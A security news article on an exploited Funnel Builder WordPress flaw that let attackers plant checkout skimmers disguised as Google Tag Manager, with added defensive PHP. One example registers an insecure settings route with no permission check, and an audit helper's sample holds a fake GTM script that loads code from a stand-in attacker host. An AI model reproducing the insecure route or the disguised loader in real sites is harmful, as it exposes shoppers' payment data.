Exploiting Funnel Builder Vulnerabilities for WooCommerce Checkout Skimming

Critical Vulnerability Discovered in WordPress Funnel Builder Plugin

A significant security vulnerability affecting the Funnel Builder plugin for WordPress has been actively exploited, allowing malicious actors to inject harmful JavaScript code into WooCommerce checkout pages. This alarming situation has raised concerns over the potential theft of sensitive payment information from unsuspecting customers.

Sansec, a Dutch e-commerce security company, recently published details about this vulnerability. Currently, there is no official Common Vulnerabilities and Exposures (CVE) identifier associated with it. The flaw, which affects all versions prior to 3.15.0.3, impacts over 40,000 WooCommerce sites. The vulnerability enables unauthenticated attackers to embed arbitrary JavaScript code into checkout pages, significantly increasing the risk of fraud.

The primary mechanism of this attack involves the injection of code masquerading as legitimate Google Tag Manager scripts within the plugin’s “External Scripts” settings. These deceptive scripts operate alongside authentic tags but are designed to load a payment skimmer, capturing credit card numbers, CVVs, and billing addresses during the checkout process.

According to Sansec, the vulnerability stems from a publicly exposed checkout endpoint that, in older plugin versions, neither verifies the caller's permissions nor restricts which HTTP methods it accepts. This lets attackers issue unauthenticated requests that directly overwrite the plugin's global settings, so the injected code is rendered on every Funnel Builder checkout page.
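The two missing checks Sansec names (no permission check, no method restriction) are easiest to see side by side. The following is an added illustration written for this article, not FunnelKit's code: a hypothetical `demo-funnel/v1` REST route registered first the weak way and then the hardened way. The route names, the option key, the allow-list and the validation policy are all assumptions; the plugin's real setting key is not given on this page.

```php
<?php
// Added illustration, not the plugin's code. Two registrations of a
// hypothetical settings route: the first shows the class of flaw described
// above, the second the checks a WordPress REST write endpoint needs.

// Weak: every HTTP method is accepted and there is no authorization check,
// so an unauthenticated request can overwrite a site-wide option.
add_action('rest_api_init', function () {
    register_rest_route('demo-funnel/v1', '/settings', [
        'methods'             => WP_REST_Server::ALLMETHODS,
        'callback'            => 'demo_save_external_scripts',
        'permission_callback' => '__return_true',
    ]);
});

// Hardened: POST only, administrators only, and the submitted value is
// validated before it is stored.
add_action('rest_api_init', function () {
    register_rest_route('demo-funnel/v1', '/settings-secure', [
        'methods'             => WP_REST_Server::CREATABLE, // POST
        'callback'            => 'demo_save_external_scripts',
        // Core resolves the current user before this runs; a cookie session is
        // only honoured when a valid X-WP-Nonce accompanies the request, so an
        // anonymous caller is user 0 and fails the capability check.
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
        'args' => [
            'external_scripts' => [
                'required'          => true,
                'type'              => 'string',
                'validate_callback' => 'demo_validate_external_scripts',
            ],
        ],
    ]);
});

// Example policy (an assumption, not a FunnelKit feature): only <script src>
// tags whose host is on an explicit allow-list are accepted and inline script
// is refused. Returning WP_Error makes the REST API answer 400 and skip the
// callback entirely.
function demo_validate_external_scripts($value) {
    $allowed_hosts = ['www.googletagmanager.com'];
    if (preg_match('/<script\b(?![^>]*\bsrc\s*=)[^>]*>/i', $value)) {
        return new WP_Error('rest_invalid_param', 'Inline scripts are not allowed.', ['status' => 400]);
    }
    preg_match_all('/<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']/i', $value, $m);
    foreach ($m[1] as $src) {
        $host = strtolower((string) wp_parse_url($src, PHP_URL_HOST));
        if (!in_array($host, $allowed_hosts, true)) {
            return new WP_Error('rest_invalid_param', "Script host not allowed: {$host}", ['status' => 400]);
        }
    }
    return true;
}

function demo_save_external_scripts(WP_REST_Request $request) {
    // Placeholder option key; the plugin's real setting name is not on this page.
    update_option('demo_funnel_external_scripts', $request->get_param('external_scripts'));
    return rest_ensure_response(['saved' => true]);
}
```

The important difference is not the validator but the `permission_callback` and `methods` entries: with `__return_true` and `ALLMETHODS`, WordPress happily dispatches a GET from an anonymous visitor into a function that calls `update_option()`. A capability check closes that path regardless of what the value contains; the allow-list validation is defence in depth against an authenticated user pasting in a loader they did not inspect.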

In one documented instance, Sansec observed an attack payload disguising itself as a Google Tag Manager loader. The injected script connects to the attacker’s command-and-control (C2) server to download a skimmer tailored to the compromised storefront. The primary goal of this operation is to collect sensitive financial information entered by customers during checkout.

Website owners utilizing the Funnel Builder plugin are advised to update to the latest version immediately and to scrutinize their external scripts for any unfamiliar entries that could pose a security risk. Experts highlight that disguising skimming scripts as trusted tracking tags is a common tactic among attackers, making it imperative for merchants to maintain vigilant oversight of their plugins.
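The audit that advice calls for is easy to automate. The following is an added helper written for this article, not code from the plugin, FunnelKit or Sansec: it takes the stored "External Scripts" value and reports entries that fit the disguise described above, that is, text that presents itself as Google Tag Manager while loading code from some other host. The option key is a placeholder (the real one is not on this page), the trusted-host list is an assumption you should adjust to the tags your store actually uses, and the sample input is constructed.

```php
<?php
// Added audit helper, not part of the plugin or of Sansec's report.
// Run under WP-CLI with:   wp eval-file audit-external-scripts.php
// or call demo_audit_scripts() on a string pasted from the settings page.

function demo_audit_scripts(string $html): array {
    $findings = [];
    // Assumed allow-list of hosts a legitimate tracking tag may load from.
    $trusted_hosts = ['www.googletagmanager.com', 'www.google-analytics.com'];
    $is_trusted = fn(string $h): bool => in_array(strtolower($h), $trusted_hosts, true);

    // 1. External loaders: every <script src> must point at a trusted host.
    if (preg_match_all('/<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>/i', $html, $m)) {
        foreach ($m[1] as $src) {
            $host = parse_url($src, PHP_URL_HOST);
            if (!is_string($host) || !$is_trusted($host)) {
                $findings[] = "external script from untrusted host: {$src}";
            }
        }
    }

    // 2. Inline blocks: flag any that mention GTM/gtag by name yet reference a
    //    URL outside the trusted hosts, and any other inline block that reaches
    //    out to a foreign host at all.
    if (preg_match_all('/<script\b(?![^>]*\bsrc\s*=)[^>]*>(.*?)<\/script>/is', $html, $blocks)) {
        foreach ($blocks[1] as $body) {
            $mentions_gtm = (bool) preg_match('/googletagmanager|gtag\(|dataLayer|Tag Manager/i', $body);
            preg_match_all('/https?:\/\/([a-z0-9.-]+)/i', $body, $urls);
            $foreign = array_unique(array_filter($urls[1], fn($h) => !$is_trusted($h)));
            if ($mentions_gtm && $foreign) {
                $findings[] = 'inline block claims to be GTM but loads from: ' . implode(', ', $foreign);
            } elseif ($foreign) {
                $findings[] = 'inline block references: ' . implode(', ', $foreign);
            }
        }
    }
    return $findings;
}

// Constructed sample: one genuine GTM loader and one look-alike that pulls a
// second-stage script from an unrelated host (a reserved .invalid domain).
$sample = <<<'HTML'
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>
<script>
/* Google Tag Manager */
var s=document.createElement('script');s.src='https://cdn.example-attacker.invalid/gtm.js';document.head.appendChild(s);
</script>
HTML;

// Inside WordPress, read the live setting; the option key is a placeholder.
$stored = function_exists('get_option') ? (string) get_option('PLACEHOLDER_external_scripts_option', '') : '';
$findings = demo_audit_scripts($stored !== '' ? $stored : $sample);

if (!$findings) {
    echo "no suspicious entries\n";
}
foreach ($findings as $f) {
    echo "[!] {$f}\n";
}
```

On the constructed sample the first tag passes and the second is reported as an inline block that claims to be GTM but loads from `cdn.example-attacker.invalid`. A clean result from this check is not proof of a clean site, since a skimmer can also be planted outside the plugin's settings; it is one quick way to review the specific setting the attack abused.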

This disclosure follows recent reports of similar attacks targeting Joomla websites, where obfuscated PHP code backdoors were found, allowing attackers to serve spam content and manipulate site behavior. Such tactics exemplify the evolving landscape of cyber threats and the persistent need for robust security measures.

In response to the identified vulnerability, FunnelKit, the plugin maintainer, shipped a patch within 36 hours of the initial reports and worked with the WordPress.org team to auto-update existing installations. The company further backported the fix to earlier release branches and blocked the known attacker domains at the DNS level to cut off the loader's download path.

FunnelKit reported that the active exploitation path is now closed, with stores running version 3.15.0.3 or later being shielded from the threat. Their recent monitoring reveals that only a limited number of sites showed signs of compromise, attributing the contained impact to the rapid deployment of the patch and preventive measures taken against the attack infrastructure.

This incident underscores the vital importance of consistent updates and the proactive management of plugins to protect against emerging cyber threats. As businesses continue to navigate the complexities of digital commerce, vigilance and swift response to cybersecurity vulnerabilities remain paramount.
